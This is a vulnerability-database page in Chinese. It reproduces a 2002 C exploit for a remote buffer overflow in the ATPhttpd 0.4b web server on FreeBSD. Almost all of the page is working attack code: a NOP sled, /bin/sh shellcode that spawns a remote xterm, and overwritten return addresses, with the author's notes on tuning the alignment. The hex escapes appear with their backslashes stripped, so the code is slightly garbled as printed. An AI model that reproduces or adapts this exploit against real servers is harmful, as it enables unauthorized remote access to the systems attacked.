ATPhttpd 0.4b – Remote Buffer Overflow
漏洞ID | 1053600 | 漏洞类型 | |
发布时间 | 2002-07-12 | 更新时间 | 2002-07-12 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | FreeBSD | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*
source: http://www.securityfocus.com/bid/5215/info
ATPhttpd is a small webserver designed for high-performance. It was developed by Yann Ramin.
There exist several exploitable buffer overflow conditions in ATPhttpd. Remote attackers may levarage these vulnerabilities to gain access on affected servers.
*/
/* atphttpd exploit.
/ The exploit sucks, if you get it wrong the first time the server just dies
/ so I didnt bother adding any offset argument to the exploit. Also if you
/ change the IP addy you may have to change the alignment a little.
/
/ http://www.badc0ded.com
*/
#define ret "x78xf5xbfxbf"
char FreeBSD[]= /* stolen lsd-pl.net shellcode */
"xebx25" /* jmp <cmdshellcode+39> */
"x59" /* popl %ecx */
"x31xc0" /* xorl %eax,%eax */
"x50" /* pushl %eax */
"x68""//sh" /* pushl $0x68732f2f */
"x68""/bin" /* pushl $0x6e69622f */
"x89xe3" /* movl %esp,%ebx */
"x50" /* pushl %eax */
"x66x68""-c" /* pushw $0x632d */
"x89xe7" /* movl %esp,%edi */
"x50" /* pushl %eax */
"x51" /* pushl %ecx */
"x57" /* pushl %edi */
"x53" /* pushl %ebx */
"x89xe7" /* movl %esp,%edi */
"x50" /* pushl %eax */
"x57" /* pushl %edi */
"x53" /* pushl %ebx */
"x50" /* pushl %eax */
"xb0x3b" /* movb $0x0b,%al */
"xcdx80" /* int $0x80 */
"xe8xd6xffxffxff" /* call <cmdshellcode+2> */
"/usr/X11R6/bin/xterm -display 127.0.0.1:0;";
main ()
{
int i;
for (i=0;i<=501;i++) // this would be a good place to change alignment
printf("x90");
printf("%s",FreeBSD);
for (i=0;i<=100;i++)
printf("%s",ret);
printf("nn");
}
相关推荐: DataLynx suGuard Vulnerability
DataLynx suGuard Vulnerability 漏洞ID 1104867 漏洞类型 Environment Error 发布时间 1999-01-03 更新时间 1999-01-03 CVE编号 N/A CNNVD-ID N/A 漏洞平台 N/A…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666